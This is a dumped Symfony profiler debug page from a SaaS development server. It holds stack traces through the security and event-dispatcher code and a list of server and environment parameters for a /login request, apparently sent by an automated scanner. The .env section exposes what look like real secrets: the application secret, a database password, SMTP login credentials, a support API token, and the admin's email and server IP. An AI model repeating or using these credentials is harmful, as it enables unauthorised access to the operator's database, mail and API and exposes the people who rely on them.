    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 220
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 56
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 139
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 157
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 76
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/http-kernel/Kernel.php"
    "line" => 197
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/public/index.php"
    "line" => 30
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
]
Symfony\Component\Security\Core\Authentication\Token\Storage\UsageTrackingTokenStorage:41
[
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-core/Authentication/Token/Storage/UsageTrackingTokenStorage.php"
    "line" => 41
    "function" => "getMetadataBag"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 172
    "function" => "getToken"
    "class" => "Symfony\Component\Security\Core\Authentication\Token\Storage\UsageTrackingTokenStorage"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 158
    "function" => "executeAuthenticator"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 140
    "function" => "executeAuthenticators"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php"
    "line" => 40
    "function" => "authenticateRequest"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php"
    "line" => 68
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php"
    "line" => 46
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Firewall/AbstractListener.php"
    "line" => 26
    "function" => "authenticate"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php"
    "line" => 83
    "function" => "__invoke"
    "class" => "Symfony\Component\Security\Http\Firewall\AbstractListener"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Firewall.php"
    "line" => 95
    "function" => "callListeners"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 116
    "function" => "onKernelRequest"
    "class" => "Symfony\Component\Security\Http\Firewall"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 220
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 56
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 139
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 157
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 76
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/http-kernel/Kernel.php"
    "line" => 197
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/public/index.php"
    "line" => 30
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
]

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
APP_ENV
"dev"
APP_SECRET
"dt62dc8a5ftb8t88cte1166d90tfc4a5"
DATABASE_URL
"mysql://2d_saas_dev:n2Da%py>6bRW4jaS@127.0.0.1:3306/armony_main?serverVersion=11.4.4-MariaDB"
FOG_NODE_ADDRESS
"https://127.0.0.1:9000"
FOG_NODE_ADDRESS_PHP
"https://127.0.0.1:9000"
MAILER_DSN
"smtp://dispatcher@2d-solutions.it:DjJyfrSWflfX@mail.2d-solutions.it:587"
MAILER_URL
"smtp://mail.2d-solutions.it:587?encryption=tls&username=dispatcher@2d-solutions.it&password=DjJyfrSWflfX"
MAIN_REMOTE_HOST
"https://main.2dsaas.it"
MAIN_SUPPORT_API_TOKEN
"373dc5f77c24750aa227862b50b19505153c2a23"
MESSENGER_TRANSPORT_DSN
"doctrine://default?auto_setup=0"
SAAS_DEFAULT_TEMPLATE
"Clools"
SAAS_DEFAULT_URI
"https://main-dev.2d-armony.it"
SAAS_ENVIRONMENT
"PROD"
SAAS_INSTALLATION_SLUG
"D001"

Defined as regular env variables

Key Value
APP_DEBUG
"1"
CONTENT_LENGTH
"753"
CONTENT_TYPE
"multipart/form-data; boundary=--------WebKitFormBoundaryx8jO2oVc6SWP3Sad"
CONTEXT_DOCUMENT_ROOT
"/var/www/main-dev.2d-armony.it/Symfony/public"
CONTEXT_PREFIX
""
DOCUMENT_ROOT
"/var/www/main-dev.2d-armony.it/Symfony/public"
GATEWAY_INTERFACE
"CGI/1.1"
HTTPS
"on"
HTTP_ACCEPT
"*/*"
HTTP_ACCEPT_ENCODING
"gzip, deflate"
HTTP_CONNECTION
"keep-alive"
HTTP_COOKIE
"PHPSESSID=7gm1bq8t33k7sh5oobvo7csdj8; sf_redirect=%7B%22token%22%3A%22580dbe%22%2C%22route%22%3A%22index%22%2C%22method%22%3A%22GET%22%2C%22controller%22%3A%7B%22class%22%3A%22App%5C%5CController%5C%5CDefaultController%22%2C%22method%22%3A%22index%22%2C%22file%22%3A%22%5C%2Fvar%5C%2Fwww%5C%2Fmain-dev.2d-armony.it%5C%2FSymfony%5C%2Fsrc%5C%2FController%5C%2FDefaultController.php%22%2C%22line%22%3A513%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D"
HTTP_HOST
"main-dev.2d-armony.it"
HTTP_NEXT_ACTION
"x"
HTTP_USER_AGENT
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0"
HTTP_X_NEXTJS_HTML_REQUEST_ID
"SSTMXm7OJ_g0Ncx6jpQt9"
HTTP_X_NEXTJS_REQUEST_ID
"b5dce965"
PATH
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
PHP_SELF
"/index.php"
QUERY_STRING
""
REDIRECT_HTTPS
"on"
REDIRECT_SSL_TLS_SNI
"main-dev.2d-armony.it"
REDIRECT_STATUS
"200"
REDIRECT_URL
"/login"
REMOTE_ADDR
"18.134.227.154"
REMOTE_PORT
"40692"
REQUEST_METHOD
"GET"
REQUEST_SCHEME
"https"
REQUEST_TIME
1765926543
REQUEST_TIME_FLOAT
1765926543.5476
REQUEST_URI
"/login"
SCRIPT_FILENAME
"/var/www/main-dev.2d-armony.it/Symfony/public/index.php"
SCRIPT_NAME
"/index.php"
SERVER_ADDR
"84.247.179.183"
SERVER_ADMIN
"lorenzo.sali@2dinformatica.it"
SERVER_NAME
"main-dev.2d-armony.it"
SERVER_PORT
"443"
SERVER_PROTOCOL
"HTTP/1.1"
SERVER_SIGNATURE
"<address>Apache/2.4.65 (Debian) Server at main-dev.2d-armony.it Port 443</address>\n"
SERVER_SOFTWARE
"Apache/2.4.65 (Debian)"
SSL_TLS_SNI
"main-dev.2d-armony.it"
SYMFONY_DOTENV_VARS
"APP_ENV,APP_SECRET,MAILER_DSN,DATABASE_URL,MAILER_URL,SAAS_DEFAULT_URI,SAAS_DEFAULT_TEMPLATE,SAAS_ENVIRONMENT,FOG_NODE_ADDRESS,FOG_NODE_ADDRESS_PHP,MESSENGER_TRANSPORT_DSN,MAIN_REMOTE_HOST,SAAS_INSTALLATION_SLUG,MAIN_SUPPORT_API_TOKEN"

Parent Request

Return to parent request (token = 2eabea)

Key Value
_controller
"App\Controller\DefaultController::login"
_firewall_context
"security.firewall.map.context.main"
_redirected
true
_remove_csp_headers
true
_route
"app_login"
_route_params
[
  "mode" => "NORMAL"
]
_security_firewall_run
"_security_main"
_stopwatch_token
"c9a1ef"
mode
"NORMAL"